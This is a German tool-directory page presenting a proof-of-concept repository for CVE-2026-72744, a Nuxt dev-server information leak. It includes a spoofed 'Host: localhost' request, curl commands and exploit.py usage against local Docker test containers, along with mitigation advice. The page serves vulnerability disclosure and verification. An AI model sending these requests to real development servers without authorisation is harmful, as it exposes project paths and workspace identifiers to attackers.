Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-72744-poc — Proof-of-Concept-Exploit für CVE-2026-72744, eine Schwachstelle zur Offenlegung von Informationen im Chrome-DevTools-Arbeitsbereichs-Endpunkt des Nuxt-Entwicklungsservers. Demonstriert den Fehler und verifiziert die Behebung. | Kitploit
Tools/GitHubGitHub/saku0512/cve-2026-72744-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHubsaku0512/cve-2026-72744-poc

CVE-2026-72744-poc

Proof-of-Concept-Exploit für CVE-2026-72744, eine Schwachstelle zur Offenlegung von Informationen im Chrome-DevTools-Arbeitsbereichs-Endpunkt des Nuxt-Entwicklungsservers. Demonstriert den Fehler und verifiziert die Behebung.

Repository anzeigen
vor 5h 17mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-72744: Nuxt Chrome DevTools-Endpunkt Informationsleak PoC

English version

Übersicht

Dieses Repository ist ein Proof of Concept (PoC) für die Informationsleak-Schwachstelle CVE-2026-72744 im Chrome DevTools workspace-Endpunkt des Nuxt-Entwicklungsservers.

Der anfällige Entwicklungsserver bestimmt, ob der Verbindungsaufbau lokal ist, nicht über die TCP-Peer-Adresse, sondern über vom Angreifer steuerbare HTTP-Header wie Host. Wenn der Entwicklungsserver an 0.0.0.0 gebunden ist, kann ein nicht authentifizierter Angreifer im LAN über eine Anfrage mit Host: localhost den absoluten Projektpfad und die persistente workspace-UUID abrufen.

Dieses PoC startet Nuxt 4.5.0 (anfällige Version) und 4.5.1 (behobene Version) in Docker und sendet vom Host aus dieselbe Anfrage, um die unterschiedlichen Verhaltensweisen zu überprüfen. Es werden keine Dateien gelesen oder geschrieben und kein Code ausgeführt.

Haftungsausschluss

Nur für Bildungszwecke und autorisierte Sicherheitsüberprüfungen verwenden. Senden Sie keine unaufgeforderten Anfragen an Umgebungen Dritter.

Details zur Schwachstelle

  • CVE-ID: CVE-2026-72744
  • Produkt: Nuxt
  • Typ: Informationsleak (CWE-200)
  • Betroffene Versionen: >= 4.4.7, < 4.5.1 und >= 3.21.7, < 3.21.10
  • Behobene Versionen: 4.5.1 / 3.21.10
  • Ziel: Nur Entwicklungsserver (Production-Build nicht betroffen)
  • Voraussetzungen: Netzwerkerreichbare Bindung und standardmäßig aktiviertes experimental.chromeDevtoolsProjectSettings
  • Auswirkung: Offenlegung des absoluten Pfads von rootDir und der projektspezifischen workspace-UUID

Grundursache

In der anfälligen Version behandelt isLocalDevRequest eine Anfrage als lokal, wenn Host auf der Zulassungsliste steht und keine browserbasierten Cross-Site-Header vorhanden sind. Nicht-Browser-Clients können diese Header frei weglassen oder setzen, sodass die folgende Anfrage die Prüfung besteht.

root@kitploit:~
GET /.well-known/appspecific/com.chrome.devtools.json HTTP/1.1
Host: localhost

Die behobene Version verlangt zusätzlich zur bestehenden Header-Prüfung, dass die tatsächliche TCP-Peer-Adresse Loopback (127.0.0.0/8 oder ::1) ist.

Proof of Concept (Verwendung)

1. Umgebung starten

root@kitploit:~
docker compose up -d --build
URLVersionErwartetes Ergebnis
http://localhost:3000Nuxt 4.5.0HTTP 200, Informationsleak
http://localhost:3001Nuxt 4.5.1HTTP 403

Der erste Build kann einige Minuten dauern, da npm-Pakete heruntergeladen werden.

2. Anfällige Version verifizieren

root@kitploit:~
python3 exploit.py -t http://localhost:3000 --expect vulnerable

Erwartete Ausgabe:

root@kitploit:~
[!] VULNERABLE: the endpoint disclosed workspace.root and workspace.uuid.

3. Behobene Version verifizieren

root@kitploit:~
python3 exploit.py -t http://localhost:3001 --expect fixed

Erwartete Ausgabe:

root@kitploit:~
[+] FIXED: the non-loopback request was rejected with HTTP 403.

4. Überprüfung mit curl

root@kitploit:~
curl -i -H 'Host: localhost' \
  http://localhost:3000/.well-known/appspecific/com.chrome.devtools.json

curl -i -H 'Host: localhost' \
  http://localhost:3001/.well-known/appspecific/com.chrome.devtools.json

Da die Anfrage über die Docker-Portweiterleitung läuft, ist die vom Container aus gesehene Verbindungsquelle nicht Loopback. Dadurch lassen sich auf einem einzelnen Host Bedingungen reproduzieren, die einem LAN-Angriff entsprechen.

5. Aufräumen

root@kitploit:~
docker compose down -v

PoC-Erkennungsbedingungen

exploit.py setzt Host: localhost und greift ohne Origin, Referer und Sec-Fetch-Site auf den Ziel-Endpunkt zu. Nur wenn das JSON mit HTTP 200 die Zeichenketten workspace.root und workspace.uuid enthält, wird es als anfällig eingestuft. HTTP 403 ist das erwartete Verhalten der behobenen Version.

Gegenmaßnahmen

Aktualisieren Sie Nuxt 4.x auf 4.5.1 oder höher und Nuxt 3.x auf 3.21.10 oder höher. Falls ein Update nicht möglich ist, binden Sie den Entwicklungsserver nur an Loopback oder setzen Sie experimental.chromeDevtoolsProjectSettings: false.

Referenzen

  • GitHub Security Advisory GHSA-7c4v-fwgw-9rf7
  • Nuxt 4.5.1 release
  • Fix commit
  • NVD: CVE-2026-72744
Tool herunterladen